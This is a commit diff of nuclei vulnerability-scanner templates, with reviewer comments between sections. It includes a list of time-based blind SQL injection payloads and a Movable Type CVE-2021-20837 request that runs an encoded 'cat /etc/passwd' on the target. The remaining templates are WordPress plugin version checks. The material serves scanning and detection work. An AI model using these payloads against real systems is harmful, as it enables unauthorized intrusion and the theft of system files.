20240829
actions-user committed Aug 29, 2024
1 parent 0a55daf commit 97eb6f5
Showing 123 changed files with 6,159 additions and 511 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20240828
20240829
93 changes: 93 additions & 0 deletions poc.txt


66 changes: 33 additions & 33 deletions poc/auth/BlindSQLAuth.yaml
@@ -1,33 +1,33 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: KhukuriRimal
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
- "XOR(if(now()=sysdate(),sleep(7),0))XOR"
- "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "duration>=7 && duration <=16"
condition: and
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: Coffinxp/lostsec
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'%2b(select*from(select(sleep(7)))a)%2b'"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
- "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
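Review bot: Assuming the second copy of the template (the one ending with the single `duration>=7 && duration <=16` entry) is the new side, the matcher is now timing-only: with `status_code == 200` and `condition: and` gone, any response that happens to take 7–16 s — a slow host, a rate-limiting proxy, a tarpit — is reported as a Critical finding. Restore `- "status_code == 200"` together with `condition: and`, or, better for false-positive control, compare the delayed response against an un-injected baseline request before matching. Note also that with the `condition` key removed, nuclei falls back to its default of `or` the moment a second DSL expression is added, so the key is worth keeping even while there is only one expression.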
43 changes: 31 additions & 12 deletions poc/cve/CVE-2021–20837.yaml
@@ -1,23 +1,42 @@
id: CVE-2021-20837

info:
name: RCE in MovableType
author: zin_min_phyo
severity: critical
reference: https://nemesis.sh/posts/movable-type-0day/
tags: MovableType,RCE
name: Movable Type XMLRPC API vulnerable to OS command injection
author: Min Won
description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher..
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837
severity: high
tags: cve,cve2021,rce

requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi"
- raw:
- |
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: POC
Accept: */*
Content-Length: 198
Connection: close
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGNhdCAvZXRjL3Bhc3N3ZGA=
</base64>
</value>
</param>
</params>
</methodCall>
body: '<?xml version="1.0"?><methodCall><methodName>mt.handler_to_coderef</methodName><params><param><value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64></value></param></params></methodCall>'



matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body

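Review bot: The section header names the file `poc/cve/CVE-2021–20837.yaml` with a non-ASCII en dash, while the template's `id:` is `CVE-2021-20837` with an ASCII hyphen, so lookups by id, globbing and path-based tooling will not find this file; rename it to `poc/cve/CVE-2021-20837.yaml`. The raw request hard-codes `Content-Length: 198` above a multi-line XML body — if nuclei does not recompute the length for this raw block (it normally does unless `unsafe: true` is set), the value has to match the body byte-for-byte or the server may truncate or reject the request. The description ends in a garbled credit (`Crd --> Orginal Researcher..`); move the credit to `author:` or drop it, and `severity: high` looks low against the critical rating NVD gives this CVE, if memory serves. The template also uses `requests:` where the other templates in this commit use `http:`; which of these lines are new is not recoverable from the rendered page, so treat the above as applying to whichever side survives.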
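--- /dev/null
+++ b/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097
+
+info:
+name: >
+Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization
+author: topscoder
+severity: low
+description: >
+The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-prod
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 7.2
+cve-id: CVE-2022-2440
+metadata:
+fofa-query: "wp-content/plugins/theme-editor/"
+google-query: inurl:"/wp-content/plugins/theme-editor/"
+shodan-query: 'vuln:CVE-2022-2440'
+tags: cve,wordpress,wp-plugin,theme-editor,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "theme-editor"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.8')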
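Review bot: `severity: low` contradicts the template's own `cvss-score: 7.2` (High under CVSS 3.1), and the same mismatch appears in the CVE-2024-1056 and CVE-2024-1384 sections (`low` against 6.4, Medium); if the downgrade is deliberate because this is a readme-version fingerprint rather than a proof of exploitation, record that next to the field, e.g. `# severity intentionally below CVSS: version check only, not confirmed exploitable`. The extractor regex `(?mi)Stable tag: ([0-9.]+)` leaves `version` unset when a readme says `Stable tag: trunk`, so the dsl matcher then fails silently and a vulnerable install is missed — the same applies to the CVE-2022-46858, CVE-2024-1056 and CVE-2024-1384 templates in this commit. Both extractors carry `name: version`; assuming the non-internal duplicate exists only so the value is printed in output, a one-line comment saying so would spare the next reader the question. Indentation was lost in rendering, so the nesting of `extractors` and `matchers` under the `http` entry is inferred.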
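--- /dev/null
+++ b/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e
+
+info:
+name: >
+Product Specifications for Woocommerce <= 0.6.0 - Reflected Cross-Site Scripting via Arbitrary Query String Parameter
+author: topscoder
+severity: medium
+description: >
+The Product Specifications for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the arbitrary query string parameters in versions up to, and including, 0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/916d4f2f-769b-4902-9464-f55d8f64c9d2?source=api-prod
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2022-46858
+metadata:
+fofa-query: "wp-content/plugins/product-specifications/"
+google-query: inurl:"/wp-content/plugins/product-specifications/"
+shodan-query: 'vuln:CVE-2022-46858'
+tags: cve,wordpress,wp-plugin,product-specifications,medium
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/product-specifications/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "product-specifications"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 0.6.0')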
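--- /dev/null
+++ b/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad
+
+info:
+name: >
+Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post
+author: topscoder
+severity: low
+description: >
+The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-prod
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+cvss-score: 6.4
+cve-id: CVE-2024-1056
+metadata:
+fofa-query: "wp-content/plugins/funnel-builder-pro/"
+google-query: inurl:"/wp-content/plugins/funnel-builder-pro/"
+shodan-query: 'vuln:CVE-2024-1056'
+tags: cve,wordpress,wp-plugin,funnel-builder-pro,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "funnel-builder-pro"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 3.4.5')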
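--- /dev/null
+++ b/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e
+
+info:
+name: >
+Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+author: topscoder
+severity: low
+description: >
+The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-prod
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+cvss-score: 6.4
+cve-id: CVE-2024-1384
+metadata:
+fofa-query: "wp-content/plugins/auxin-portfolio/"
+google-query: inurl:"/wp-content/plugins/auxin-portfolio/"
+shodan-query: 'vuln:CVE-2024-1384'
+tags: cve,wordpress,wp-plugin,auxin-portfolio,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "auxin-portfolio"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.3.3')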
